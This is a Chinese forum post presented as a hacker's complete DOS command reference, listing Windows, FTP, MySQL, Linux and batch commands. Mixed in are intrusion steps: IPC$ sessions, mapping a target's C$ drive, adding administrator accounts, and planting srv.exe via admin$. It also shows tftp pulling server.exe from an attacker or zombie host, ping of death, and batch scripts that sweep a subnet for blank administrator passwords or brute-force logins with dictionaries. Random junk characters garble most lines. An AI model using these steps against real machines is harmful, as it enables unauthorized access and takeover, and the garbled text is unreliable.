黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
4 o+ G( h. F  {# u( P; Wnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 ; S( K% y& F0 v. E6 O$ g
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
' e9 Q0 B9 H' `  Gnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: & D/ u8 J2 {/ R, f" V; }
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 5 q; b) ^, z9 @4 y& {
net use h: /del 删除映射对方到本地的为H:的映射
6 t7 }& F5 [! _net user 用户名　密码　/add 建立用户
9 |* i& w+ k9 S! q2 k. h6 Y, Onet user guest /active:yes 激活guest用户 3 J9 {- R- V5 P& o
net user 查看有哪些用户 . X5 Z( c/ u* k3 x
net user 帐户名 查看帐户的属性
  t4 w- j5 r- |net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
. }! d: M# o! pnet start 查看开启了哪些服务
+ u  o9 ^: U5 Ynet start 服务名　 开启服务；(如:net start telnet， net start schedule)
- u, j8 a& N- `. ~$ T2 nnet stop 服务名 停止某服务
3 A/ M. O0 J( B' Q& b1 \net time \\目标ip 查看对方时间 5 n) O0 B4 P, q' E. P" J& j
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 . m% z% w/ g) L% }/ Z4 O0 N
net view 查看本地局域网内开启了哪些共享
0 \$ K- T  F! Fnet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 ! B1 a% l  c3 f( s
net config 显示系统网络设置
6 o4 R' G( x. T3 z+ P& Anet logoff 断开连接的共享
! O* T' {, |* A9 {net pause 服务名 暂停某服务
0 H/ J) X0 F5 j% cnet send ip "文本信息" 向对方发信息 ( L. M/ [" b  j, O& G* \& T
net ver 局域网内正在使用的网络连接类型和信息 ; l$ `. V7 L- _9 B& ^
net share 查看本地开启的共享
% g  `3 `6 M  p( Jnet share ipc$ 开启ipc$共享 2 @* I$ P  W* I- K' N* Z
net share ipc$ /del 删除ipc$共享 " K8 F( \3 ]$ Z' X7 @- Z
net share c$ /del 删除C：共享 / l4 A% B- T0 N9 |! I4 m* m
net user guest 12345 用guest用户登陆后用将密码改为12345 / c' T: k0 p( @6 W* X
net password 密码 更改系统登陆密码 . {* a% c# M/ ~$ P" V6 F
netstat -a 查看开启了哪些端口,常用netstat -an
0 N( i+ q4 o; R  anetstat -n 查看端口的网络连接情况，常用netstat -an
2 s& L% f9 ^2 H/ Q! \netstat -v 查看正在进行的工作
* v/ x0 b/ b1 d5 vnetstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） # L5 c2 M& X# `( S% u1 C& m
netstat -s 查看正在使用的所有协议使用情况
; s: L5 a( `8 unbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
0 z% g: C4 [' |tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 / ^5 K& u1 ^! d5 l
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
* c) G- ^# Y. c% Y# m- Oping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) $ ?  P! P; j, Y/ @: X
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 7 O( p5 G, `: R6 r  [. @7 u7 r
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
3 o* ^, }* t4 V( ~4 {5 ?- I. ~kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) / P) {, L2 Y0 m6 B
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
  l, K1 b" r& _8 ]* Q3 `; ^. @- gdel /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） 2 q. ^8 q/ D  L
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 : Y. n0 `# U7 q* F. `
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
5 M8 V$ Z6 P  L+ W# Fat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
, x0 D* G8 f1 Xat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 3 F; Q/ D4 y+ A1 t
at id号 /delete 停止某个已注册的计划任务 ) k" ~' ~3 e( o5 N
at 查看所有的计划任务
( U/ Q* K: T# R6 Oat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
" V+ Z3 P! g  _finger username @host 查看最近有哪些用户登陆
0 }6 U' C$ f1 v4 D& E- @# [* ~telnet ip 端口 远和登陆服务器,默认端口为23 : y* T+ o& d. U: T" x
open ip 连接到IP（属telnet登陆后的命令） / m2 l7 M8 t& v, S
telnet 在本机上直接键入telnet 将进入本机的telnet
& b2 G  k( }+ k3 Q2 Ecopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
5 h1 M9 @# u0 \8 {% rcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
# O* p% U) o9 z# c0 T( Ucppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
5 P) S0 s- {, a: e  {  ^: ^copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
- Y+ K& p& U1 rxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 ( X. f( g& H7 [; k1 l8 ?- b
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 * {  f6 e/ T- u
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
1 V- _# _5 y6 P; R. r  B# n1 i( Aftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) . V8 `5 |+ n4 y9 a
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
  u9 J  h1 j4 l0 K1 b6 x# b, earp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
! X0 U! W/ A4 [* l3 x! n4 D2 R( Tstart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 2 t6 k& y( T0 y% `+ G+ m& S5 q& e
mem 查看cpu使用情况 ; l8 c) z& B& ~- q6 ]
attrib 文件名(目录名) 查看某文件（目录）的属性
! Z, U" W( P. E' Yattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
4 o3 j, [! {- Pdir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 " W- E/ B1 Q- G$ q) P' ^( o
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 9 ^! U, `+ k4 m6 r9 U
set 指定环境变量名称=要指派给变量的字符 设置环境变量 5 V) h! }* K$ c4 N- T- U
set 显示当前所有的环境变量
! F6 I; r1 Z* d6 \& pset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 6 |% X8 n: s8 L  ?# L8 J% B
pause 暂停批处理程序，并显示出：请按任意键继续....
) ~" U' N' }5 D6 K4 ~if 在批处理程序中执行条件处理（更多说明见if命令及变量） : Q% M% f9 w5 q- t* v* i1 C% B5 h
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） . {: L' w+ Z  c! C
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） 7 c' O; `- [, h$ c7 Q) q
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） 1 g* Z7 \2 f9 B) f8 y! y
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
2 Z+ q" c4 y5 {' Q0 f! d' Hecho 信息 在屏幕上显示出信息
, ^, `$ L4 N0 J1 K. D' f9 Uecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中 3 k7 [/ }, V' A# M; A1 g3 p% U
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
3 f3 P5 L8 r% Y+ b* O. \9 S$ b4 Xfind 文件名 查找某文件 3 \4 j& c3 M9 y( g; m7 [
title 标题名字 更改CMD窗口标题名字
1 S: b# S3 N0 ccolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 * T' x  U. y9 ~  v+ P
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
1 ]. n8 x( ~+ @$ w9 Yprint 文件名 打印文本文件
! W1 A5 `; V$ Rver 在DOS窗口下显示版本信息 , w. v- H& m+ W3 m$ L
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） : q$ v6 |4 g1 ?4 V. T
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
3 I# w6 z$ k% d2 w  z$ |md　目录名 创建目录 + T6 f5 e! D5 N# R6 I
replace 源文件　要替换文件的目录 替换文件
/ b+ T7 C9 L+ \% d+ b  sren 原文件名　新文件名 重命名文件名 # h0 b/ {: p# E! Z% M
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
* J, _+ }+ v/ ]type 文件名 显示文本文件的内容
* _% Q  D" d7 U: umore 文件名 逐屏显示输出文件
- {  w  K4 Y1 f% u, l4 e9 \; {) Vdoskey 要锁定的命令＝字符
& ]' D" _8 p) X  ~6 n* Z2 ?, udoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
! j6 r5 y0 l8 L- G# `: f" itaskmgr 调出任务管理器
, Y& P( R/ [* \$ t3 k, R% {chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
' Y2 s% G0 i) U7 atlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 2 B9 X* K8 C& q6 s  U
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe 9 v" ^, Q- X* F3 e; L" |+ t
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 + p! C3 v6 \+ O/ n& \/ O+ n
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? 1 U! l# d/ G- V% L$ p
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； 8 G0 `! Y" C) R6 h: b
regedit /e 注册表文件名 导出注册表
) F1 l5 u8 t, Ncacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
: J) ^- y% F  n5 Mcacls 文件名 查看文件的访问用户权限列表
  f: i6 R! o' K+ A/ ]  i" {REM 文本内容 在批处理文件中添加注解 + h3 \& ~+ o+ r& W
netsh 查看或更改本地网络配置情况
. B: ]* A# I8 K2 e7 f8 X8 wIIS服务命令：7 Z- S  a7 \: L- `
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
: }  N' O6 Z, x: e3 F9 Z- siisreset /start或stop 启动（停止）所有Internet服务 / _: @; Q& d% i* k- `
iisreset /restart 停止然后重新启动所有Internet服务 , ~" h# J) B7 d2 t, x
iisreset /status 显示所有Internet服务状态
: X, |/ B7 Q" {  |8 a4 ^$ o+ w$ q' Piisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
2 r% b  k% D; C4 h( T, piisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 7 M2 k1 a: c: c3 `, T/ N
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
* q1 x4 F1 ]+ p, g$ l0 [1 M/ m" Xiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 0 \4 ^! p! M+ K5 @. C( d" b
FTP 命令： (后面有详细说明内容) , d  T6 P, _& b1 B" E; s
ftp的命令行格式为:
# X. O6 a' t; n7 E4 p. L4 yftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。4 m  ^" C0 \: c) R( d: s8 ]* X; I
－d 使用调试方式。 & s* p9 Y/ \4 u% k; [0 L3 G
－n 限制ftp的自动登录,即不使用.netrc文件。
' p( B9 L4 e& s5 o－g 取消全局文件名。 * b$ w9 k, c% E
help [命令] 或 ？[命令] 查看命令说明 4 K$ m4 @% O( r$ Y, j  d
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
% k7 a) P" g: ^: }pwd 列出当前远端主机目录
: |/ |$ G4 ^0 f) Y! C/ V: Oput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
/ X, z% \; m, h0 \9 T7 fget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
' x* x9 ?! O8 O2 h+ I# Vmget [remote-files] 从远端主机接收一批文件至本地主机 $ t7 c! D1 I$ }. n3 y
mput local-files 将本地主机中一批文件传送至远端主机 % ^" i! c# m4 V) A. H1 m
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 3 [6 r0 |4 F# {, w! c3 K$ u
ascii 设定以ASCII方式传送文件(缺省值) - S* t/ Q( M, y1 f6 P" g
bin 或 image 设定以二进制方式传送文件 ; s9 z7 ?2 `# [; M$ M
bell 每完成一次文件传送,报警提示 , o( X+ U0 e& S
cdup 返回上一级目录
  u8 ?8 o0 D5 D6 G. Y& {close 中断与远程服务器的ftp会话(与open对应) " A; J3 y8 V% h& }1 u6 e9 v
open host[port] 建立指定ftp服务器连接,可指定连接端口 : d* [# X6 {/ u6 V
delete 删除远端主机中的文件
" u: V/ g) ^2 t6 Wmdelete [remote-files] 删除一批文件
; K  T$ E4 F7 b, [7 zmkdir directory-name 在远端主机中建立目录
' Q, l4 |9 l" L; J4 j% L& v9 v$ srename [from] [to] 改变远端主机中的文件名 5 X8 a% ]6 _0 E: y1 D' _
rmdir directory-name 删除远端主机中的目录 3 Z4 J  Y! d% ]1 A
status 显示当前FTP的状态
& {: A! E! p* C5 I- e1 b; o% n. Ssystem 显示远端主机系统类型
* G. Z5 K7 Q7 ~9 euser user-name [password] [account] 重新以别的用户名登录远端主机 + ~) ^! Y% T, `6 y
open host [port] 重新建立一个新的连接
/ s* t+ B4 J& r; ~& f; o; Rprompt 交互提示模式 5 Q: {+ y& R8 Z9 b) l
macdef 定义宏命令 4 a* m7 t# C3 _$ m7 p4 I
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
1 Q7 l, J8 T5 l6 h# B& r# z- cchmod 改变远端主机的文件权限 / z) ]7 C( z& `/ _0 E% M
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
* Z. A: T' q3 D# m8 Y" K+ H9 P8 k0 tcd remote－dir 进入远程主机目录
! a% {: W( k6 m( y2 T. ocdup 进入远程主机目录的父目录
' |, c5 g( G/ X% o) j+ {! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip * a; G1 H& p( W- E
MYSQL 命令： & S0 e' @; i/ I0 L, e$ E# k% z
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
7 Z* ?/ N$ ^/ Q' {2 F, _6 P3 p（例：mysql -h110.110.110.110 -Uroot -P123456 # w2 F! @* E% S% n
注:u与root可以不用加空格，其它也一样）
$ Z' |1 ]& n1 \5 ~! @+ _/ e; {* o2 Dexit 退出MYSQL
* P6 b. V2 ~! A3 nmysqladmin -u用户名 -p旧密码 password 新密码 修改密码 . `* g5 a3 h1 u  }6 \8 ~# B8 D. \2 a, c
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） 2 E$ V9 @2 |3 f3 J/ b' \
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 : ]& D) f% j* {9 G- j
use mysql；
+ p) E0 L( M% M1 {show tables; 显示库中的数据表
: M; d, z6 C; P$ {6 J. {describe 表名; 显示数据表的结构
4 Y1 ~2 j$ S5 W) h9 T, u: ucreate database 库名; 建库 - P$ s7 d* n; Y& Y$ @3 ~6 g
use 库名；
$ t9 C; d! y; ?create table 表名 (字段设定列表)； 建表 2 M& X8 T+ {9 h- E3 G2 g! j
drop database 库名; 8 ?" u2 l- ^6 M- }7 v& y, [! o+ h
drop table 表名； 删库和删表
# ], H# x0 Z7 E$ ?2 Adelete from 表名; 将表中记录清空 8 v% }# \% l, u3 k
select * from 表名; 显示表中的记录 2 T; ?) _" U+ F* {- q
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
3 k  X$ m- B- W% F0 lwin2003系统下新增命令（实用部份）：
: j# s1 @9 J* ^0 C, s/ t: |shutdown /参数 关闭或重启本地或远程主机。4 C; @% x- z8 Q; u' q2 B5 T
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。' _( d6 e+ c$ n
例：shutdown /r /t 0 立即重启本地主机（无延时）
' |# e) N/ T) g+ Qtaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
" e1 p4 }' R* x9 }" {% X参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 / I$ p3 d% a3 y+ O- P
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。) r" }0 z: y; g7 o: c
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
! H( d( J( D9 H* NLinux系统下基本命令： 要区分大小写
* w0 v; [  I1 C# `uname 显示版本信息（同win2K的 ver） 1 C: H: Q) I6 q6 M8 X
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
3 C' @$ ^9 O- j" g: Hpwd 查询当前所在的目录位置 4 F5 o+ B9 }: N' g# P
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 ) @( I! ^" Y- O$ d0 P5 }/ `. Z
cat 文件名 查看文件内容
" ~5 n% |0 F0 t/ R# ^$ Vcat >abc.txt 往abc.txt文件中写上内容。
9 H+ V7 `& L1 j+ Fmore 文件名 以一页一页的方式显示一个文本文件。 6 Z$ U+ x3 q& z
cp 复制文件 . b: B! c) k, T/ e
mv 移动文件
3 a! g1 O$ ~& X. ?rm 文件名 删除文件，rm -a 目录名删除目录及子目录 : y! m' `9 `2 F
mkdir 目录名 建立目录
% n. L2 @& L$ Q$ V4 h; {# [rmdir 删除子目录，目录内没有文档。 0 |* Y; _# ^$ b
chmod 设定档案或目录的存取权限 # O* F1 i4 ^' N& e1 k$ X. S* d6 y
grep 在档案中查找字符串 8 Q! E& Y) Z( ^- q6 t2 N# N
diff 档案文件比较
6 C. h" Q- a6 n1 o% A$ M) Wfind 档案搜寻
& H$ }8 H% o' cdate 现在的日期、时间 8 m% k+ V5 T' g+ Y1 Y% F* r: s- ]
who 查询目前和你使用同一台机器的人以及Login时间地点 5 I. o; O" V7 h( A8 a
w 查询目前上机者的详细资料
, }% Q  m9 H8 `. t1 s; _+ C  Wwhoami 查看自己的帐号名称
! V2 j+ ]# M" F. ngroups 查看某人的Group 7 t! I& ^- R8 U8 T
passwd 更改密码 ! u% N5 q1 Z, V# Z# s0 |4 q( d
history 查看自己下过的命令
5 {$ O9 Q% ?+ aps 显示进程状态 ( a  v8 {) V7 j* B: D! G1 K9 k+ H" g
kill 停止某进程
6 g8 `1 u( E8 \7 J: Igcc 黑客通常用它来编译C语言写的文件
3 \1 d' v! @' b& k+ L5 D& Asu 权限转换为指定使用者
0 n# u2 i/ V) {2 I0 `' Ftelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
6 t) p) l- r8 C, i/ S9 Wftp ftp连接上某服务器（同win2K* D% i' h9 w0 J* Y  W$ Y
附：批处理命令与变量
! z& {4 u$ G8 @# u1 P1：for命令及变量 基本格式：
% h1 g' ^" X# c) N) J" eFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。: w, A/ ~; _/ C
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3( Z* H1 C7 h7 D" x& y+ O3 X' [9 s/ j
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
2 O2 V) Q4 ]  P- v4 Fcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
; C0 S4 ^& n' |command_parameters：为特定命令指定参数或命令行开关' }" R  M% ~' ?7 c8 Z6 P# k
IN (set)：指在(set)中取值；DO command ：指执行command& V9 @+ U: k: N4 l9 ]
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
: U/ h/ a2 Y6 m% S用法举例： " O( E2 h! _/ Z
@echo off 9 D  {1 y0 ^/ ~  I9 q# i7 t
echo 用法格式：test.bat *.*.* > test.txt
; V& Y, \6 v: N- Gfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt 9 R) l9 \8 p% Q, ^, Y
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。# s, W. C7 `) v$ R* g6 x5 ^9 E. O
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
+ K  D( \" W  I- O& z@echo off 8 f8 g, {) O8 [6 J
echo 用法格式：ok.bat ip
5 [( U/ X* O, t6 [% D. n8 SFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 ! M* ~/ l( l2 |: m, Z2 \+ T, z
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。. t% ]9 W9 M% L/ `& ?
2：if命令及变量 基本格式： 0 D2 E' @9 y' @1 X/ Q! H+ R
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。' w- V! V+ ~3 O. i/ m
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
7 u- g; U% y( r; }* f0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 - N- @; C" V$ u/ H
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。2 \& t) n& u4 m
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
- O! `- v: F8 vIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
! p' X0 P* M- Y% X" A4 h例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 6 y& Z* E( b- C" T" J/ _
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”